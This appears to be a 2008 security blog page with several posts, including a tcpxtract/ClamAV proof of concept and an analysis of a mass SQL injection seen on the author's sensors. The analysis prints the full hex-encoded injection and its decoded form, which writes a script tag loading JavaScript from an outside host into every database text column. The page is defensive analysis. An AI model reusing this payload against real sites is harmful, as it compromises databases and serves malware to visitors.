09.27.08
Posted in OpenSourceSoftware at 7:47 pm by Edward Bjarte Fjellskål
I had this idea, that if tcpxtract can carve files out of your network traffic, it might be combined with ClamAV (clamscan) to check the files for viruses. This has probably been done before, and all web proxies that scan web content do this in some way.
But my thought was to combine this with Sguil, so that the result would be reported to the F8 monkeys in a form such as:
$SRC_IP:$SRC_PORT -> $DST_IP:$DST_PORT : $FILE_TYPE, $VIRUS_TYPE
Clicking on the "Alert ID" would give one a transcript of the session, as usual, or something like that…
tcpxtract has an output like this:
Found file of type "jpg" in session [81.31.233.9:20480 -> 78.156.13.199:29620], exporting to /tmp/tcpxtract/spool/00000048.jpg
In my PoC I then mv the files over to a check dir, and clamscan gives output like this:
# clamscan --no-summary /tmp/tcpxtract/check/
/tmp/tcpxtract/check/00000048.jpg: Eicar-Test-Signature FOUND
My plan was to correlate info from the two logfiles, from clamscan and tcpxtract, and gather it in a third logfile for a sguil_agent to pick up and send to Sguil.
My Proof of Concept (PoC) stops here, as tcpxtract does not run for very long on my Ubuntu Hardy test server before it segfaults on my ass :/ I found two patches for tcpxtract, but I have not had the time and strength (I'm rather sick at the moment) to check them out.
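A working version of the correlation step, added here as an example (not the PoC code from the post): it parses the two log formats shown above, joins them on the carved file's basename (the only thing that survives the mv from spool/ to check/), and emits one line per hit in the proposed Sguil format. The log lines are constructed samples; the second line of each log is made up.

```python
import os
import re

# Constructed sample logs in the formats shown in the post (the second line of each is made up).
TCPXTRACT_LOG = """\
Found file of type "jpg" in session [81.31.233.9:20480 -> 78.156.13.199:29620], exporting to /tmp/tcpxtract/spool/00000048.jpg
Found file of type "gif" in session [10.0.0.5:80 -> 192.168.1.20:51234], exporting to /tmp/tcpxtract/spool/00000049.gif
"""
CLAMSCAN_LOG = """\
/tmp/tcpxtract/check/00000048.jpg: Eicar-Test-Signature FOUND
/tmp/tcpxtract/check/00000049.gif: OK
"""

XTRACT_RE = re.compile(
    r'Found file of type "(?P<ftype>[^"]+)" in session '
    r'\[(?P<src>\S+) -> (?P<dst>[^\]]+)\], exporting to (?P<path>\S+)'
)
CLAM_RE = re.compile(r"^(?P<path>.+?): (?P<sig>.+) FOUND$")


def parse_tcpxtract(log: str) -> dict:
    """Map carved-file basename -> {ftype, src, dst, path} for every 'Found file' line."""
    sessions = {}
    for line in log.splitlines():
        m = XTRACT_RE.search(line)
        if m:
            # Files are mv'd from spool/ to check/, so the basename is the only stable join key.
            sessions[os.path.basename(m.group("path"))] = m.groupdict()
    return sessions


def parse_clamscan(log: str) -> dict:
    """Map basename -> signature name for every 'FOUND' line; 'OK' lines are ignored."""
    return {
        os.path.basename(m.group("path")): m.group("sig")
        for m in (CLAM_RE.match(line.strip()) for line in log.splitlines())
        if m
    }


def correlate(xtract_log: str, clam_log: str) -> list:
    """One alert line per infected file, in the SRC -> DST : TYPE, VIRUS form proposed in the post."""
    sessions = parse_tcpxtract(xtract_log)
    alerts = []
    for name, sig in parse_clamscan(clam_log).items():
        s = sessions.get(name)
        if s is None:
            continue  # hit on a file tcpxtract never logged: no session to attribute it to
        alerts.append(f"{s['src']} -> {s['dst']} : {s['ftype']}, {sig}")
    return alerts
```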
The story might continue…
09.25.08
Posted in Information, OpenSourceSoftware, Ubuntu at 9:17 pm by Edward Bjarte Fjellskål
When I got my x61 laptop, I did not remember that it made this high pitch sound it now does. I believe that it came along with one of the Ubuntu Hardy kernel upgrades. The sound is only present when the machine is on battery power, and it was driving me crazy!
I Googled around, and found others referring to the same noise, though on other types of laptops. The problem seems to occur when max_cstate is at level C3 or higher. So I put it on C2.
You have to do this in the /etc/modprobe.d/options file, and then build a new initrd image, because this module is loaded from the initrd at boot time.
Add options processor max_cstate=2 to /etc/modprobe.d/options and then update the initrd image (update-initramfs -u).
After you have rebooted, you can check the max_cstate in /proc/acpi/processor/CPU0/power to see that you are at the desired level.
And listen… no noise!
09.19.08
Posted in Information, OpenSourceSoftware, Security at 4:00 pm by Edward Bjarte Fjellskål
As an exercise for myself, and because I'm curious by nature… I had to find out what kind of Chinese attacks are hitting my sensors today. One thing is to see that it's a SQLi attempt, *move on*; another is to really see what they are trying to do. And by using Google, one can get an idea of the extent of such an attack. So here goes:
The URL that is triggering my sensors:
;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343030302920444
5434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612
C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F
4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746520
5B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E
636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C
2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2
D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444
5414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1
If you can decode the hex string just by looking at it, you are way ahead of me… If not, you are probably just normal, and perl could be a good friend:
# echo "0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F722043
5552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061
2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D3233312
06F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F20
40542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275
D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F73637269
70743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687
474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020
5461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72"
|perl -pe 's/(..)(..)/chr(hex($1)).chr(hex($2))/ge' | hexdump -C
Will give you something like this:
00 44 45 43 4c 41 52 45 20 40 54 20 76 61 72 63 |.DECLARE @T varc|
68 61 72 28 32 35 35 29 2c 40 43 20 76 61 72 63 |har(255),@C varc|
68 61 72 28 34 30 30 30 29 20 44 45 43 4c 41 52 |har(4000) DECLAR|
45 20 54 61 62 6c 65 5f 43 75 72 73 6f 72 20 43 |E Table_Cursor C|
55 52 53 4f 52 20 46 4f 52 20 73 65 6c 65 63 74 |URSOR FOR select|
20 61 2e 6e 61 6d 65 2c 62 2e 6e 61 6d 65 20 66 | a.name,b.name f|
72 6f 6d 20 73 79 73 6f 62 6a 65 63 74 73 20 61 |rom sysobjects a|
2c 73 79 73 63 6f 6c 75 6d 6e 73 20 62 20 77 68 |,syscolumns b wh|
65 72 65 20 61 2e 69 64 3d 62 2e 69 64 20 61 6e |ere a.id=b.id an|
64 20 61 2e 78 74 79 70 65 3d 27 75 27 20 61 6e |d a.xtype='u' an|
64 20 28 62 2e 78 74 79 70 65 3d 39 39 20 6f 72 |d (b.xtype=99 or|
20 62 2e 78 74 79 70 65 3d 33 35 20 6f 72 20 62 | b.xtype=35 or b|
2e 78 74 79 70 65 3d 32 33 31 20 6f 72 20 62 2e |.xtype=231 or b.|
78 74 79 70 65 3d 31 36 37 29 20 4f 50 45 4e 20 |xtype=167) OPEN |
54 61 62 6c 65 5f 43 75 72 73 6f 72 20 46 45 54 |Table_Cursor FET|
43 48 20 4e 45 58 54 20 46 52 4f 4d 20 20 54 61 |CH NEXT FROM  Ta|
62 6c 65 5f 43 75 72 73 6f 72 20 49 4e 54 4f 20 |ble_Cursor INTO |
40 54 2c 40 43 20 57 48 49 4c 45 28 40 40 46 45 |@T,@C WHILE(@@FE|
54 43 48 5f 53 54 41 54 55 53 3d 30 29 20 42 45 |TCH_STATUS=0) BE|
47 49 4e 20 65 78 65 63 28 27 75 70 64 61 74 65 |GIN exec('update|
20 5b 27 2b 40 54 2b 27 5d 20 73 65 74 20 5b 27 | ['+@T+'] set ['|
2b 40 43 2b 27 5d 3d 27 27 22 3e 3c 2f 74 69 74 |+@C+']=''"></tit|
6c 65 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 |le><script src="|
68 74 74 70 3a 2f 2f 77 77 77 30 2e 64 6f 75 68 |http://www0.douh|
75 6e 71 6e 2e 63 6e 2f 63 73 72 73 73 2f 77 2e |unqn.cn/csrss/w.|
6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 21 2d |js"></script><!-|
2d 27 27 2b 5b 27 2b 40 43 2b 27 5d 20 77 68 65 |-''+['+@C+'] whe|
72 65 20 27 2b 40 43 2b 27 20 6e 6f 74 20 6c 69 |re '+@C+' not li|
6b 65 20 27 27 25 22 3e 3c 2f 74 69 74 6c 65 3e |ke ''%"></title>|
3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 |<script src="htt|
70 3a 2f 2f 77 77 77 30 2e 64 6f 75 68 75 6e 71 |p://www0.douhunq|
6e 2e 63 6e 2f 63 73 72 73 73 2f 77 2e 6a 73 22 |n.cn/csrss/w.js"|
3e 3c 2f 73 63 72 69 70 74 3e 3c 21 2d 2d 27 27 |></script><!--''|
27 29 46 45 54 43 48 20 4e 45 58 54 20 46 52 4f |')FETCH NEXT FRO|
4d 20 20 54 61 62 6c 65 5f 43 75 72 73 6f 72 20 |M  Table_Cursor |
49 4e 54 4f 20 40 54 2c 40 43 20 45 4e 44 20 43 |INTO @T,@C END C|
4c 4f 53 45 20 54 61 62 6c 65 5f 43 75 72 73 6f |LOSE Table_Curso|
72 20 44 45 41 4c 4c 4f 43 41 54 45 20 54 61 62 |r DEALLOCATE Tab|
6c 65 5f 43 75 72 73 6f 37 32 0a |le_Curso72.|
Which spells out two things for me. First, the SQL command itself, which is cool: it opens a cursor over every text column of every user table and appends a script tag to the contents of each one.
Then we have the evil JavaScript that it wants to serve to those who surf your website:
http://www0.douhunqn.cn/csrss/w.js
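Decoding the CAST(0x…) payload in Python instead of the perl one-liner, as an added example that is not from the post: it URL-decodes the request line, decodes every hex literal (also the NCHAR/NVARCHAR form, which this payload does not use and which goes beyond the text), pulls out the planted script URL, and names the column types the cursor targets. The request line is constructed; /page.asp?id=1 and example.invalid are placeholders, not values from the attack.

```python
import re
from urllib.parse import unquote

# Constructed request line in the shape of the one in the post: ASCII T-SQL wrapped in
# CAST(0x... AS CHAR(4000)).  The path and the script host are placeholders, not attack values.
SAMPLE_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name "
    "from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 "
    "or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''\"></title>"
    "<script src=\"http://example.invalid/w.js\"></script><!--''+['+@C+']') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
SAMPLE_REQUEST = ("GET /page.asp?id=1;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
                  + SAMPLE_SQL.encode("ascii").hex().upper() + "%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1")

# CAST(0x<hex> AS [N][VAR]CHAR(n)); group 2 is the N prefix, which changes the text encoding.
HEX_LITERAL = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?)(?:VAR)?CHAR\(\d+\)\)", re.I)
SCRIPT_SRC = re.compile(r"""<script\s+src=["']?([^"'>\s]+)""", re.I)
XTYPE_NAMES = {35: "text", 99: "ntext", 167: "varchar", 175: "char", 231: "nvarchar", 239: "nchar"}


def decode_cast_hex(request_line: str) -> list:
    """URL-decode the request line and turn every CAST(0x...) literal back into text."""
    texts = []
    for hexstr, n_prefix in HEX_LITERAL.findall(unquote(request_line)):
        if len(hexstr) % 2:
            raise ValueError("odd-length hex literal: the captured request is probably truncated")
        # CHAR/VARCHAR carry single-byte text; the N-variants carry UTF-16LE.
        encoding = "utf-16-le" if n_prefix else "latin-1"
        texts.append(bytes.fromhex(hexstr).decode(encoding, errors="replace"))
    return texts


def injected_script_urls(request_line: str) -> list:
    """Distinct <script src> URLs that the decoded payload would write into the database."""
    urls = []
    for sql in decode_cast_hex(request_line):
        for url in SCRIPT_SRC.findall(sql):
            if url not in urls:
                urls.append(url)
    return urls


def targeted_column_types(sql: str) -> list:
    """Names of the syscolumns.xtype values the cursor selects, i.e. the column types that get overwritten."""
    return [XTYPE_NAMES.get(int(x), f"xtype {x}") for x in re.findall(r"b\.xtype=(\d+)", sql)]
```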
Then, for the Google search of this specific attack:
http://www.google.no/search?hl=en&q="script+src%3Dhttp%3A%2F%2Fwww0.douhunqn.cn%2Fcsrss%2Fw.js"&btnG=Search
Which gives me 18,800 hits at the moment. Editing the search makes things look even worse.
I even see banks among the hits from Google.
UPDATE: 5 Hours later - Google reports 19,700 Hits
UPDATE: 27 Hours later - Google reports 2,070 Hits
09.18.08
Posted in Information, OpenSourceSoftware, Ubuntu at 9:15 pm by Edward Bjarte Fjellskål
I always seem to end up, after some time, with a rather strangely working wireless connection. A quick iwlist shows that I have 30 wireless neighbors within my range today…
# iwlist wlan0 scan|grep Channel:|wc -l
30
To take another quick look at what channels they are using, to get an idea of which channels to stay away from:
# iwlist wlan0 scan|grep Channel:| sort | uniq -c |sort -g
1 Channel:10
1 Channel:12
1 Channel:13
1 Channel:2
1 Channel:5
1 Channel:7
2 Channel:9
2 Channel:3
4 Channel:8
4 Channel:6
5 Channel:1
6 Channel:11
I see that today Channel:4 is not in the air at all, so I switch away from Channel:1 and my life is back to normal.
So, again, know your wireless neighbors… you might feel a difference!